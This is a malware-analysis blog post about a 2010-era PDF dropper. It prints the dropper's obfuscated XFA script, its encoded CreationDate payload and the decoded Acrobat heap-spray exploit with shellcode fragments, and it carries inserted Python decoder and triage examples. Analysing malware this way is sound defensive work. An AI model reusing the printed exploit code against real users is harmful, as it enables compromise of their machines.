PDF dropper analysis

31/10/2017 in malware | tags : pdf, js, malware, dropper by ghozt

Intro

While looking for some malware samples, I landed on this website.

The "whatami.zip" file inspired me; once downloaded and unzipped, SURPRISE!

ghozt@glider: ~/whatami/file>$ file whatami 
whatami: PDF document, version 1.6

I wanted to reverse some PE or Linux ELF, but not this time...

PDF inspection

Let's use the peepdf tool to see what kind of malicious stuff is inside.

ghozt@glider: ~/whatami/file>$ python2 ~/tools/peepdf/peepdf.py -fi whatami
File: whatami
MD5: 97ccac199b8893380e14b0583596abb6
SHA1: 5d6244a12982fa121b571affae6141d5db4437ee
SHA256: 3dee507f593266f9b4bbe9d50eddd906bee4295a4b64d7b6e8039286b321e700
Size: 14781 bytes
Version: 1.6
Binary: True
Linearized: False
Encrypted: False
Updates: 0
Objects: 27
Streams: 12
URIs: 0
Comments: 0
Errors: 9

Version 0:
    Catalog: 1
    Info: No
    Objects (27): [1, 2, 3, 6, 8, 13, 14, 15, 18, 19, 20, 21, 22, 27, 28, 29, 30, 31, 32, 41, 42, 43, 44, 45, 46, 48, 52]
    Streams (12): [52, 13, 18, 19, 32, 41, 42, 43, 44, 45, 46, 48]
        Encoded (10): [13, 18, 19, 32, 41, 42, 43, 44, 46, 48]
    Objects with JS code (1): [43]
    Suspicious elements:
        /AcroForm (1): [1]
        /Names (1): [1]
        /XFA (1): [1]
        /EmbeddedFile: [41, 42, 43, 44, 45, 46]

Hmm, an XFA form, some embedded files, and... "Objects with JS code (1): [43]"...

PPDF> stream 43

<!--#@^#@^#T@V%@NY%VU#@NTYW#&T--><template><subform layout="tb" locale="ru_RU" name="form1"><pageSet><pageArea id="Page1" name="Page1"><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="10.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm"><ui><imageEdit></imageEdit></ui><caption placement="bottom" reserve="5mm"><font typeface="Myriad Pro"></font><para vAlign="middle"></para><value><text>Image Field</text></value></caption><border xmlns="http://www.xfa.org/schema/xfa-template/2.2/"><edge presence="hidden"></edge><edge stroke="dotted"></edge><edge stroke="dotted"></edge><edge stroke="dashed"></edge><corner stroke="dotted"></corner><corner stroke="dotted"></corner><corner stroke="dashed"></corner><fill><pattern type="crossDiagonal"></pattern></fill></border><event xmlns:xfa="http://www.xfa.org/schema/xfa-template/2.2/" activity="initialize">
<xfa:script contentType='&#000000097;pplication/x-javascript'>
/*




*/
with(event){
l="l";
ev=/*ewbwf*/"eva"/*/renyaerz*/;
t=target;
aa=/*/gbergern*/'co'+'de]';
ind="indexOf";
if(app.setProfile)if((app.setProfile+/**/"asvfa")[ind](aa)!=-1){k=t[/*czx*/ev/*qwdsa*/+l/*sgewgerj*/];}
a=/**/t.creationDate.split('|')[0].substr(13);
}
s="";
p=k("pars"+"eInt");
z=a;
e="de";
ll="length";
ss=/*bgre*/k("String");
ff="from";
ff+="Ch";
ff+="arCo";
ss=ss[ff/*x*/+e];
xz=a.length;
for(i=0;i&lt;xz;i+=2){
    if (z[i]=='-')continue;
    s=s+(ss(p(z[i]+z[i+1],0x1a)));
}
zx=k;
zx(s);
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>

If one day someone asks you for a definition of a shitty, failed obfuscation, please send them this!

Basically, the script gets the "creationDate" object, deobfuscates it, then eval()s the result.

Let's dump the "creationDate" object and let the script deobfuscate it for us.

PPDF> search creationdate

[3, 43]

PPDF> object 3

<< /Title asdasdsad
/CreationDate %#^&*%^#@&%#@3J-348481K3J-7443N4A4C-1293N4E3N-0464C1K4C-83J4A3P3N-44C1K3L4A-63N3J4C41-147462G3J-14C3N1K4B-34844414C-81E1D4K1D-41F3D1N3F-51K4A3N48-8443J3L3N-81E1L271L-63P1I1D1D-61F274E3J-74A16483J-83M3M4146-53P274E3J-74A163K3K-03K1I163L-03L3L1I16-43M3M3M1I-7163N3N3N-31I163O3O-73O1I163P-13P3P1I16-740404027-94E3J4A16-248474146-04C3N4A4B-83H3J1I16-541274E3J-34A164G16-72916463N-04F162D4A-14A3J4H1E-01F274E3J-14A164H16-42916463N-04F162D4A-74A3J4H1E-11F274E3J-04A163H44-61N291820-73L1O1M22-61M1M3O1M-5211N2324-71M203J1P-33L1O1M22-31M1M3O1M-83O221P24-31M203J3J-71P3N3K24-71M203J1P-91M1O1M24-41O203J22-83N1O3O24-61M203J20-61N201N20-21N201N1O-8221M1M1M-41M1M1M1M-81M1M1M1M-31M1M1M1M-11M1M1M1M-01M1M1M1M-41M1M1M1M-11M1M1M1N-31O1P2524-01M203J22-1201O1M22-31M1M3O1M-41M1M201M-31M1M1M20-91N201N20-31N201N20-01N201N20-61N201N18-11H3N4E3N-3464C1K4C-93J4A3P3N-94C1K3L4A-93N3J4C41-947462G3J-84C3N1K4B-04844414C-51E1D4K1D-71F3D1N3F-81K4A3N48-1443J3L3N-11E1L271L-63P1I1D1D-81F274E3J-14A163H44-01O291820-93L1O1M22-11M1M3O3J-621221P24-31M203J1P-73L1O1M22-71M1M3O25-6221O1N24-01M203J25-31M1N3O24-01M203J1P-11M251M24-620203J23-23M233N24-71M203J20-71N201N20-71N201N1O-9221M1M1M-81M1M1M1M-61M1M1M1M-81M1M1M1M-71M1M1M1M-61M1M1M1M-51M1M1M1M-61M1M1M23-41N242424-71M203J22-7201O1M22-31M1M3O1M-51M1M201M-11M1M1M20-51N201N20-61N201N20-41N201N20-11N201N18-91H3N4E3N-1464C1K4C-03J4A3P3N-84C1K3L4A-13N3J4C41-347462G3J-04C3N1K4B-24844414C-21E1D4K1D-21F3D1N3F-01K4A3N48-9443J3L3N-91E1L271L-13P1I1D1D-01F273H44-81P293J48-948273H44-72029463N-64F162D4A-44A3J4H1E-31F273O4D-3463L4C41-34746163H-244211E1F-64J4E3J4A-0163H4422-5293H441P-11K4E413N-74F3N4A38-03N4A4B41-447461K4C-847354C4A-141463P1E-71F273H44-822293H44-5221K4A3N-048443J3L-83N1E1D1K-71D1I1D1D-21F274F40-241443N1E-93H44221K-4443N463P-24C402820-01F3H4422-41H291D1M-21D274A3N-14C4D4A46-316483J4A-84B3N2L46-84C1E3H44-8221I1N1M-31F4L3O4D-3463L4C41-04746163H-944231E3H-444241I3H-844251F4J-24F404144-33N1E3H44-8241K443N-9463P4C40-31G1O283H-144251F3H-644241H29-23H442427-
64A3N4C4D-84A46163H-244241K4B-64D3K4B4C-34A41463P-51E1M1I3H-744251L1O-71F4L3O4D-9463L4C41-04746163H-32L1M1E3H-12L1N1F4J-13H2L1N29-64D463N4B-13L3J483N-11E3H2L1N-41F274A47-54C3N2G3J-543293H2L-61N1K443N-6463P4C40-11G1O273M-43J433447-14C3N294D-4463N4B3L-43J483N1E-01D1B4D25-91M251M1D-61F274B48-84A3J4H29-13H44231E-43M3J4334-6474C3N1I-41M4G1O1M-01M1M1J4A-9474C3N2G-13J431F27-044474G39-8403N3N29-03H2L1N1H-04B484A3J-14H274447-34G39403N-33N293H44-7231E4447-64G39403N-73N1I211O-3201M2524-31F273O47-24A1E4129-01M271641-016281620-51M1M2716-4411H1H1F-33H44203D-1413F2944-1474G3940-33N3N1K4B-04D3K4B4C-74A1E1M1I-144474G39-4403N3N1K-1443N463P-94C401J1N-01F1H3M3J-44334474C-93N274L3O-14D463L4C-641474616-73H2L1O1E-33H2L1N1I-6443N461F-14J4F4041-6443N1E3H-12L1N1K44-03N463P4C-44028443N-8461F3H2L-41N1H293H-82L1N274A-23N4C4D4A-646163H2L-01N1K4B4D-93K4B4C4A-241463P1E-31M1I443N-0461F4L3O-34D463L4C-841474616-13H2L1P1E-03H2L1N1F-14J4A3N4C-7291D1D27-43O474A1E-041291M27-741283H2L-01N1K443N-1463P4C40-027411H29-61O1F4J3K-1293H2L1N-31K4B4D3K-44B4C4A1E-2411I1O1F-1273L2948-73J4A4B3N-42L464C1E-53K1I1N22-81F274A3N-04C1H2935-54C4A4146-03P1K3O4A-647452F40-73J4A2F47-03M3N1E3L-91F274L4A-23N4C4D4A-246164A3N-24C4L3O4D-0463L4C41-54746163H-542411N1E-33H2L1N1I-23H2L201F-14J3H2L21-4291D1D27-93O474A1E-33H2L2229-71M273H2L-922283H2L-91N1K443N-8463P4C40-4273H2L22-51H1H1F4J-23H442529-53H2L201K-2443N463P-74C40273H-32L23293H-02L1N1K3L-7403J4A2F-8473M3N2D-34C1E3H2L-6221F273H-82L24293H-52L201K3L-5403J4A2F-0473M3N2D-94C1E3H2L-9221B3H44-1251F273H-52L211H29-6354C4A41-6463P1K3O-94A47452F-7403J4A2F-2473M3N1E-13H2L233G-03H2L241F-0274L4A3N-24C4D4A46-1163H2L21-84L3O4D46-73L4C4147-846163H2L-3251E3H2L-4221F4J3H-3421M293H-22L221K4C-747354C4A-541463P1E-91N221F27-83H421N29-03H421M1K-5443N463P-64C40273H-52L21291E-23H421N1B-61O1F2B1D-71M1D1H3H-2421M263H-9421M274A-23N4C4D4A-046163H2L-8214L3O4D-3463L4C41-04746163H-0421O1E3H-42L1N1F4J-03H2L2129-01D1D273O-7474A1E3H-42L22291M-1273H2L22-4283H2L1N-41K443N46-63P4C4027-03H2L221H-7291O1F4J-83H2L211H-
8291D1B4D-31D273H2L-7211H293H-82L251E3H-32L1N1K3L-5403J4A2F-6473M3N2D-14C1E3H2L-9221H1N1F-41F273H2L-8211H293H-32L251E3H-62L1N1K3L-2403J4A2F-4473M3N2D-44C1E3H2L-5221F1F4L-44A3N4C4D-44A46163H-02L214L3O-64D463L4C-741474616-93H421P1E-21F4J3H42-020293H44-5211E1F27-7413O1E3H-642202825-51M1M1M1F-44J3H4221-4291D471H-54D2D3542-93P3P3P43-3484D2O20-32E2N1L1L-51L1L1L4F-82D2D2D2D-12E2D2D2D-62D2D2D2D-82D2D2D2D-62D332D2D-62D2D2D2D-12D2D3O40-23J2D3541-82D3P3B2D-725242H2L-82E2N1D27-53H422229-13H441N27-43H422329-53H2L1P1E-03H42221F-34L3N444B-63N4J3H42-221291D43-32E1H2D35-142413340-92H48253O-1472E2N1L-71L1L1L1L-64F2D2D2D-52D2E2D2D-22D2D2D2D-52D2D2D2D-92D2D332D-82D2D2D2D-02D2D2D3B-94G2F2D35-9412D3P3B-82D1L3O2H-9202E2N1D-7273H4222-4293H441O-3273H4223-1293H2L1P-41E3H4222-01F4L3H42-924291D35-03743492D-42G3P3P2D-62D2E2E1D-7273H4225-4293H2L1O-91E1D3337-42I2E1D1I-61N1M2524-5201F273H-544441M29-61D33333L-62D2D2D2H-42G2D2D2H-22D2D2D2D-24F2L2D2D-92D2D332H-92G2D2D2H-32D2D2D2D-72E2D2D2D-02D2D4F2H-42G2D2D2H-82D2D2D2D-02E2D2D2D-42D2E3P2H-62G2D2D2H-72D2D2D2D-92E2D2D2D-72D2H332H-12H2D2D2H-92D2D2D2D-92L2D2D2D-32D2I4F2H-52H2D2D2H-52D2D2D2D-34F2L2D2D-92D372D2H-62G2D2P4F-72D2D2D2F-6352L2D2D-12D2D2D2D-42D2D2D2D-42P2G2D42-81L1L1L1L-11L1D273H-844441N29-23H42241H-03H42251H-73H44441M-71H3H4221-7273H4444-91O293H42-1411N1E3H-542231I1D-21D1F2741-73O1E3H44-3441O1K44-93N463P4C-6401B1O1F-33H44441O-01H294D46-83N4B3L3J-2483N1E1D-61B1M1M1D-51F273H44-9441P293H-9421O1E3H-544441O1F-5274F414C-8401E4J43-3263H4444-71P4L1F3H-22L1M1E43-91F272L45-73J3P3N2I-3413N443M-71N1K4A3J-94F383J44-34D3N293H-644441N4L-63H421P1E-21F27| >>

What a creation date! Marty McFly would be afraid of it... anyway.

// dump of object 3, truncated here
var str = "%#^&*%^#@&%#@3J-348 ......";
// same as the XFA script: keep the part before '|', drop the 13-char prefix
str = str.split('|')[0].substr(13);
var final = "";
var size = str.length;
for (var i = 0; i < size; i += 2) {
    // a '-' is skipped together with the character after it (i += 2)
    if (str[i] == '-')
        continue;
    // each remaining pair is a base-26 number giving a char code
    final = final + String.fromCharCode(parseInt(str[i] + str[i + 1], 0x1a));
}
console.log(final)
ghozt@glider: ~/whatami/first_routine>$ node stream.js
app.alert=event.target.creationDate.split('|')[1].replace(/;/g,'');var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=_l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(_I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(_I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=String.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toString(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5='';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I5+=_I9(_I1.charCodeAt(_I6))}return _I5}function 
_j3(){_j4=_l5();if(_j4<9000){_j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=_I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_j7,'');if(_ll2.length%2)_ll2+=unescape('%00');_ll3=_j2(_ll2);with({k:_ll3})_I0(k);ImageField1.rawValue=_ll1}_j3();
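The same decoding, rewritten in Python as an added example (not the author's node script), with validation and handling of both halves of the value: the base-26 script before the '|' and the ';'-separated hex that the second stage appends to its shellcode string after it. The sample is the start of the page's object 3 value; the part after the '|' is constructed, since the real tail is not on the page.

```python
import re

PREFIX_LEN = 13   # the XFA script does .substr(13): a 13-char junk prefix
RADIX = 0x1a      # each pair is parsed with parseInt(pair, 26)

def decode_creation_date(value):
    """Statically decode this dropper's /CreationDate value (no eval needed).

    Mirrors the XFA script: keep the text before '|', drop the prefix, then read
    two chars at a time as base-26 numbers. On a '-' the original loop does
    `continue` and then i += 2, so the dash AND the char after it are skipped;
    that is why every 9-char group starts with one junk char.
    Returns (decoded_script, payload_bytes); the payload is the hex blob after
    '|' with its ';' separators removed, as the second stage uses it.
    """
    script_part, _, tail = value.partition("|")
    body = script_part[PREFIX_LEN:]
    out, i = [], 0
    while i < len(body):
        if body[i] == "-":
            i += 2                      # skip the dash and the junk char
            continue
        pair = body[i:i + 2]
        if not re.fullmatch(r"[0-9A-Pa-p]{2}", pair):
            raise ValueError(f"bad base-26 pair {pair!r} at offset {i}")
        out.append(chr(int(pair, RADIX)))
        i += 2
    payload = bytes.fromhex(tail.replace(";", "")) if tail else b""
    return "".join(out), payload

# Start of the real object 3 value from the page, plus a constructed tail
# (the real tail after '|' is not on the page).
SAMPLE = ("%#^&*%^#@&%#@3J-348481K3J-7443N4A4C-1293N4E3N-0464C1K4C-83J4A3P3N"
          "-44C1K3L4A-63N3J4C41-147462G3J-14C3N1K4B-34844414C"
          "|41;41;90;90")

if __name__ == "__main__":
    script, payload = decode_creation_date(SAMPLE)
    print(script)          # app.alert=event.target.creationDate.split
    print(payload.hex())   # 41419090
```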


Here is the script, "deobfuscated":

app.alert=event.target.creationDate.split('|')[1].replace(/;/g,'');
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var sc_v8="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');
var sc_v9="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');
var_app=app;
pwnheap=new Array();

function get_version(){
    var _l6=var_app.viewerVersion.toString();
    _l6=_l6.replace('.','');
    while(_l6.length<4)
        _l6+='0';
    return parseInt(_l6,10)
}

function _l7(_l8,_l9){
    while(_l8.length*2<_l9)
        _l8+=_l8;
    return _l8.substring(0,_l9/2)
}

function spray_heap(_I1){
    _I1=unescape(_I1);
    roteDak=_I1.length*2;
    dakRote=unescape('%u9090');
    spray=_l7(dakRote,0x2000-roteDak);
    loxWhee=_I1+spray;
    loxWhee=_l7(loxWhee,524098);
    for(i=0; i < 400; i++)
        pwnheap[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;
}

function _I2(_I1,len){
    while(_I1.length<len)
        _I1+=_I1;
    return _I1.substring(0,len)
}

function _I3(_I1){
    ret='';
    for(i=0;i<_I1.length;i+=2){
        b=_I1.substr(i,2);
        c=parseInt(b,16);
        ret+=String.fromCharCode(c);
    }
    return ret
}

function _ji1(_I1,_I4){
    _I5='';
    for(_I6=0;_I6<_I1.length;_I6++){
        _l9=_I4.length;
        _I7=_I1.charCodeAt(_I6);
        _I8=_I4.charCodeAt(_I6%_l9);
        _I5+=String.fromCharCode(_I7^_I8);
    }
    return _I5
}

function _I9(_I6){
    _j0=_I6.toString(16);
    _j1=_j0.length;
    _I5=(_j1%2) ? '0'+_j0 : _j0;
    return _I5
}

function _j2(_I1){
    _I5='';
    for(_I6=0;_I6<_I1.length;_I6+=2){
        _I5+='%u';
        _I5+=_I9(_I1.charCodeAt(_I6+1));
        _I5+=_I9(_I1.charCodeAt(_I6))
    }
    return _I5
}

function compute_shellcode(){
    version=get_version();
    if(version<9000){
        _j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        shellcode=sc_v8;
        _j7=_I3(shellcode)
    }
    else{
        _j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        shellcode=sc_v9;
        _j7=_I3(shellcode)
    }
    _j8='SUkqADggAABB';
    _j9=_I2('QUFB',10984);
    _ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1=_j8+_j9+_ll0+_j5;
    _ll2=_ji1(_j7,'');
    if(_ll2.length%2)
        _ll2+=unescape('%00');
    _ll3=_j2(_ll2);
    with({k:_ll3})
        spray_heap(k);
    ImageField1.rawValue=_ll1
}

compute_shellcode();

This time it works with the second part of the creationDate object (the part after the '|'). It looks like a heap-spraying script for Acrobat Reader (compatible with versions 8 and 9, what a conscientious guy...).

The spray and the shellcode are generated, then loaded into a .tiff image via ImageField1.rawValue. Maybe a vulnerability in the TIFF library, or something similar, in Acrobat Reader...

I did not reverse the shellcode, but according to the strings output, it downloads a malicious DLL, wpbt.dll, from a remote server, then executes it.

After some internet research: this dropper was introduced in 2010/2011 and the domain is not active anymore :(

I will register a trash email address to receive some recent malware samples :)

Conclusion

Some words about the """obfuscation""": here it is more a way to bypass some AVs than a way to hide the code. How to spot a malicious PDF:

  • errors in the xref table
  • an XFA form in the PDF
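A first-pass triage of those two heuristics (plus the other names peepdf flagged on this sample), as an added example that is not from the page or from peepdf. It scans the raw bytes only, without decompressing streams, so it catches the /AcroForm and /XFA names in the catalog but not a script hidden in an encoded stream like object 43; the two PDF samples are constructed, not the whatami file.

```python
import re

# Names peepdf flagged on this sample (/AcroForm, /XFA, /EmbeddedFile, JS)
# plus the usual JavaScript / launch triggers worth counting in a first pass.
SUSPICIOUS = [b"/XFA", b"/AcroForm", b"/JS", b"/JavaScript",
              b"/EmbeddedFile", b"/OpenAction", b"/Launch"]

def count_keywords(data):
    """Count each name in the raw bytes. No stream decompression, so it only
    sees names in plain dictionaries (here: the catalog's /AcroForm and /XFA)."""
    return {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z])", data))
            for k in SUSPICIOUS}

def check_xref(data):
    """Report xref problems: no startxref, or an offset that points neither at
    an 'xref' table nor at an 'N G obj' (cross-reference stream, PDF 1.5+)."""
    m = re.search(rb"startxref\s+(\d+)", data)
    if not m:
        return ["no startxref keyword"]
    off = int(m.group(1))
    at = data[off:off + 16]
    if at.startswith(b"xref") or re.match(rb"\d+\s+\d+\s+obj", at):
        return []
    return [f"startxref offset {off} does not point at an xref table or stream"]

def triage(data):
    kw = count_keywords(data)
    xref = check_xref(data)
    flags = [k for k, n in kw.items() if n] + xref
    return {"keywords": kw, "xref_problems": xref, "suspicious": bool(flags)}

# Constructed samples: one with an XFA form, an embedded file and a bogus
# startxref, and one clean file whose startxref offset is computed correctly.
SUSPECT = (b"%PDF-1.6\n1 0 obj\n<< /Type /Catalog /AcroForm << /XFA 5 0 R >> "
           b"/Names << /EmbeddedFiles 6 0 R >> >>\nendobj\n"
           b"7 0 obj\n<< /Type /EmbeddedFile /Length 0 >>\nstream\nendstream\nendobj\n"
           b"trailer\n<< /Root 1 0 R >>\nstartxref\n99999\n%%EOF\n")
_head = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
CLEAN = (_head + b"xref\n0 2\n0000000000 65535 f \n0000000009 00000 n \n"
         b"trailer\n<< /Size 2 /Root 1 0 R >>\nstartxref\n"
         + str(len(_head)).encode() + b"\n%%EOF\n")

if __name__ == "__main__":
    for name, d in (("suspect", SUSPECT), ("clean", CLEAN)):
        print(name, triage(d))
```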

Tools

Keep calm, grab a beer, and try harder

ghozt
